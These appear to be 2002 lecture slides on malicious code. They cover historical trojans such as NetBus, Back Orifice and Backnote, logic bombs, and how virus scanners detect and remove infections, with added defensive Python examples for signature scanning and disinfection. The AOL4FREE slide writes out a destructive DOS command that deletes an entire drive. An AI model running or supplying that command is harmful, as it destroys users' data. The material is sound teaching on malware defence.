Appears to perform a useful function, but contains code that performs an unexpected, typically not useful, possibly malicious function.

Trojans include:

Excel Easter Egg
NetBus
BackOrifice
Backnote
Aolfree.com

The important thing is these codes typically advertise themselves as performing useful functions to get users to download and execute them.

Page 56: 2/13/02 Chapter 13 Malicious Code.


Excel Easter Egg

Excel 97 contained a program embedded inside the spreadsheet program – the program performed a very different, and unexpected, function.

If the user pressed the F5 key and entered X97:L97 <enter><tab>, then held down <Ctrl-Shift> and clicked on the chart wizard,

Behold … a flight simulator appeared with a rudimentary landscape that could be navigated (flown over).

If the user navigated to the correct point, the names of the developers could be observed. Rather a boring program, but a classical Trojan.

For others – search Google on “Easter Eggs”.

Page 57: 2/13/02 Chapter 13 Malicious Code.


Netbus

Aliases: Netbus.153, Netbus.160, Netbus.170

Distribution: Typically e-mail, but found in newsgroups as well.

Function: Client-Server application that allows a remote user to control a PC (Windows 95/98 & NT). Server is installed on the victim in Windows dir and executes when Windows boots. It is stealthy - hides process name, denies delete/rename access, can vary its execution schedule & remove itself. Client (at hacker end) controls the system over TCP/IP and allows many functions to be performed - some really nasty.

Page 58: 2/13/02 Chapter 13 Malicious Code.


Netbus Features

Open/close the CD tray; show a BMP or JPEG image; swap mouse buttons.
Start an application, play a WAV file, point the mouse to some coordinate.
Show a message box and allow the victim to respond.
Shut down Windows, reboot, log off, power off.
Send keystrokes to the active application on the victim.
Get a screenshot from the victim, return system information.
Upload (push) any file to the victim.
Change the sound volume, record sounds from the victim's microphone.
Download and/or delete any file on the victim's system.
Make clicking sounds every time the victim presses a key.
Block certain keys on the victim's system.
…

Page 59: 2/13/02 Chapter 13 Malicious Code.


Back Orifice

Aliases: BO, BOSniffer, CDC-BO, BOSERVE, BOCLIENT, Orifice.srv, Orifice.addon, Hacktool.

Distribution: e-mail, newsgroups, bulletin boards.

Function: Very similar to Netbus (Netbus pre-dates Back Orifice).

One of the aliases, BOSniffer, claims to be able to detect Back Orifice, while in reality it is the Back Orifice application itself.

Page 60: 2/13/02 Chapter 13 Malicious Code.


Backnote

Aliases: URLSnoop, PICTURE.EXE, MANAGER.EXE

Size: ~ 350kB

Distributed: e-mail attachment and newsgroup postings.

Function: Copies itself to the Windows dir as NOTE.EXE and registers itself for execution when Windows boots. On execution, gathers machine information, including usernames & passwords, copies the information to an encrypted .DAT file, and attempts to e-mail the file to [email protected] & [email protected].

Page 61: 2/13/02 Chapter 13 Malicious Code.


AOL Free - A Whole Series of Trojans

At one time AOL distributed AOL4FREE to Mac users.

In early 1997, an e-mail went around saying AOL4FREE.COM was a destructive virus.

In March 1997, the major anti-virus vendors declared AOL4FREE.COM a virus hoax.

In April 1997, a real virus named AOL4FREE.COM was released - it never spread very far, but did the following:

C:
CD\
DELTREE /y *.*

Page 62: 2/13/02 Chapter 13 Malicious Code.


Logic Bombs

Program or block of code embedded in a useful program.

Scheduled to execute based on some future event (time, day, if a certain user account exists or a certain file exists - many options).

On e-day, the program executes, usually with disastrous results.

1985 Insurance Company example.

Two days after an employee was fired, the bomb went off.

Deleted 168,000 employee records.

Perpetrator was fined $11,800 and served 7 years probation.

Page 63: 2/13/02 Chapter 13 Malicious Code.


Prevention Measures - Better than the cure

Perform regular backups of all important files.

Do not introduce new media (CD, floppy, zip) to a system that has not been backed up.

Better, scan all media for viruses with a current scanner.

Do not open e-mail attachments, download executables, etc. unless you are sure of the source.

For any software you import, scan it before opening & executing.

Even some commercial software distributions have been contaminated.

Page 64: 2/13/02 Chapter 13 Malicious Code.


Virus Scanners - Scanning & Remediation

Scan the entire system including memory & disk files.

Detect the presence of a virus - if the scanner knows the virus.

Identifies the specific virus infesting the system.

Removes the offending virus restoring the system.

NOT ALWAYS SUCCESSFUL - may not recognize or remove.

Then restore from backups. Worst case, re-format the hard drive and rebuild the system.

Page 65: 2/13/02 Chapter 13 Malicious Code.


Virus Scanners - Early Years

In the beginning, there were few viruses. Respond by:

Get the virus - the key point is to have a copy of the virus.
Examine it.
Build a recognizer and dis-infector.

Methods used were based on how viruses infect. They used simple string scanning and pattern recognition. Memory and secondary storage locations, including disk boot records, were scanned. Specific bit sequences were used to identify specific viruses. They relied on known lengths to identify and remove malicious code.

The volume of viruses has overwhelmed these largely manual methods.

Page 66: 2/13/02 Chapter 13 Malicious Code.


Virus Scanners - Simple Example of Infection

Adds itself to the end of an executable (any one will do).
Modifies the header code to point at the virus (JUMP to virus).
Saves the beginning part of the file it changed (the original jump to the real program, replaced by a jump to the virus).

Entry Point        Legitimate program header
VVVVVVV            The virus jump code
Victim program     The legitimate program code
Exit               Original exit
Virus              The virus action code
Restore victim     Virus code that restores the victim so it executes
JUMP               Virus return to repaired victim

Page 67: 2/13/02 Chapter 13 Malicious Code.


Virus Scanners - Remediation

1. Find the virus: do a string search.
2. Find the original beginning of the victim: after the virus jump.
3. Find the size of the virus - look-up based on virus lab examination.

Fix by:

Remove the jump, and move the original entry point back into the place of the jump. Truncate the file at the original end of the victim, calculated from the virus size.

This is:
Tedious.
Too slow with the virus population expanding.
Easily defeated by adding superfluous instructions to the virus string during replication (varying size).
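The infection layout and the three-step remediation above, carried out on byte strings as an added example (not from the lecture). The jump encoding, the VVVVVVV signature string, and the virus body are constructed stand-ins; a real dis-infector works on executable file formats, not raw buffers.

```python
# Constructed model of the appending virus from the slides: the infected file
# begins with a jump to the virus, the virus sits appended at the end, and the
# virus keeps the bytes it overwrote so it can repair the victim before returning.
JUMP_OPCODE = b"\xe9"              # constructed: one opcode byte + 3-byte target
JUMP_LEN = 4
VIRUS_SIGNATURE = b"VVVVVVV"       # the "VVVVVVV" jump code the scanner searches for
VIRUS_TAIL = b"<action><restore victim><jump back>"   # constructed action/restore/return
VIRUS_SIZE = len(VIRUS_SIGNATURE) + JUMP_LEN + len(VIRUS_TAIL)  # the "lab" size look-up


def make_sample_infected_image(victim: bytes) -> bytes:
    """Test fixture only: lay out a victim the way the slide describes."""
    saved_entry = victim[:JUMP_LEN]                          # original entry bytes
    jump = JUMP_OPCODE + len(victim).to_bytes(3, "little")   # jump to end of file
    return jump + victim[JUMP_LEN:] + VIRUS_SIGNATURE + saved_entry + VIRUS_TAIL


def disinfect(image: bytes) -> bytes:
    """Steps 1-3 from the slide, then the fix; raises if the image does not match."""
    # 1. Find the virus: string search for its signature.
    pos = image.find(VIRUS_SIGNATURE)
    if pos < 0:
        raise ValueError("signature not found: not infected, or an unknown virus")
    # Confirm the entry jump really targets the code we found.
    target = int.from_bytes(image[1:JUMP_LEN], "little")
    if image[:1] != JUMP_OPCODE or target != pos:
        raise ValueError("entry jump does not point at the virus")
    # 3. Size of the virus from the lab look-up: the body must end exactly at EOF.
    if pos + VIRUS_SIZE != len(image):
        raise ValueError("virus length differs from lab record (padded variant?)")
    # 2. Original beginning of the victim: saved right after the jump-code signature.
    start = pos + len(VIRUS_SIGNATURE)
    saved_entry = image[start:start + JUMP_LEN]
    # Fix: put the saved entry back in place of the jump, truncate at original end.
    return saved_entry + image[JUMP_LEN:pos]


if __name__ == "__main__":
    victim = b"MZ\x90\x00program code...EXIT"      # constructed "executable"
    image = make_sample_infected_image(victim)
    assert disinfect(image) == victim
    try:                                          # superfluous bytes defeat the size look-up
        disinfect(image + b"\x90\x90")
    except ValueError as err:
        print("padded variant rejected:", err)
```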

Page 68: 2/13/02 Chapter 13 Malicious Code.


Virus Scanners - Anti-Virus Developers

Added wild card scanners, looking only for special signatures.

Heuristic scanning rules to look for generic behavior.

Add integrity checks to executables, test before execution.

Trouble was:

The signature database grew to be cumbersome.
Scanning got slower and intrusive.

The move has been to more generic scanners and interception of suspicious behavior (e.g., writing to master boot blocks).
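A wild card signature scanner and a pre-execution integrity check of the kind the slide describes, added here as an example (not the lecture's own code); the signatures and the buffers they are run over are constructed.

```python
import hashlib
import re


def compile_signature(text: str) -> re.Pattern:
    """Turn a hex signature such as 'E8 ?? ?? ?? ?? 5B' into a byte regex.
    '??' stands for any one byte, so the signature still matches when the
    virus varies offsets or padding that would break an exact string match."""
    parts = []
    for token in text.split():
        parts.append(b"." if token == "??" else re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)   # DOTALL: '.' also matches 0x0A


def scan(data: bytes, signatures: dict) -> list:
    """Return the names of all signatures found in `data`."""
    return [name for name, sig in signatures.items() if compile_signature(sig).search(data)]


def record_hash(data: bytes) -> str:
    """Hash recorded for an executable at install time."""
    return hashlib.sha256(data).hexdigest()


def integrity_ok(data: bytes, recorded_sha256: str) -> bool:
    """Integrity check before execution: any appended or patched code fails it."""
    return hashlib.sha256(data).hexdigest() == recorded_sha256


# Constructed signatures: a CALL with any 4-byte displacement followed by POP EBX
# (the call/pop idiom position-independent code uses to find its own address),
# and the "VVVVVVV" marker from the infection slide as ASCII bytes.
SIGNATURES = {
    "call-pop-decryptor": "E8 ?? ?? ?? ?? 5B",
    "sample-virus-A": "56 56 56 56 56 56 56",
}

# Constructed buffers: two variants of the same code with different displacements.
VARIANT_1 = b"\x90\x90\xe8\x00\x00\x00\x00\x5b\x81\xeb"
VARIANT_2 = b"\x90\x90\xe8\x10\x00\x00\x00\x5b\x81\xeb"
CLEAN = b"\x90\x90\x5b\x81\xeb"

if __name__ == "__main__":
    for name, buf in [("variant 1", VARIANT_1), ("variant 2", VARIANT_2), ("clean", CLEAN)]:
        print(name, scan(buf, SIGNATURES))
    print("integrity after append:", integrity_ok(CLEAN + b"\x00", record_hash(CLEAN)))
```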

Page 69: 2/13/02 Chapter 13 Malicious Code.


Modern Scanners

Memory resident - scan every file on access.
On-line profile updates - to keep the database current.
Signature scanning - looking for unique signatures.
Generic decryptors:
    Operate in single-step instruction mode.
    Scan for suspicious activity.

Simulators - emulate instruction execution in a virtual mode - don't actually execute the instruction on the real machine; execute it in a protected "sandbox" while observing behavior.

Combine simulation and signature analysis.

Page 70: 2/13/02 Chapter 13 Malicious Code.


Combining Simulation & Signatures - Virus Signs:

1. Encryption. A code decryptor is found.

2. Attempts to Open an executable file.

3. Suspicious file access (certain files like system files).

4. Time/date event trigger routines (time/date test).

5. Memory resident code.

6. Interrupt hooks.

7. Undocumented interrupt calls.

Page 71: 2/13/02 Chapter 13 Malicious Code.


Combining Simulation & Signatures - Virus Signs (more):

8. Self-Relocation in memory, especially if non-standard.

9. Programs that scan for memory size.

10. File search code - search for exe, com, bat files.

11. Strange memory allocation.

12. Replication - the code overwrites the start of other codes.

13. Anti-debugging code.

14. Direct disk access - not by OS call.

Page 72: 2/13/02 Chapter 13 Malicious Code.


Combining Simulation & Signatures - Virus Signs (more):

15. Use of undocumented DOS features.

16. Program checks for .exe, .com extensions.

17. Program load trap.

18. Attempts to perform BIOS access.

Continuing effort on the part of the virus developers to void the actions of the anti-virus community, and by the anti-virus community to stay even with the virus developers.

Very much like the real world of biological viruses.

Page 73: 2/13/02 Chapter 13 Malicious Code.


Summary

Detect - based on samples of the virus contributed to an anti-virus vendor for action.

Analysis I - vendor observes the code and determines whether it is reliably detected with existing signature and heuristics capability.

Analysis II - determine the method to remove the virus by defining the entry point & length.

Remediation - write dis-infecting code for the specific virus.

Distribution - update the profile, signature, and remediation library for on-line distribution.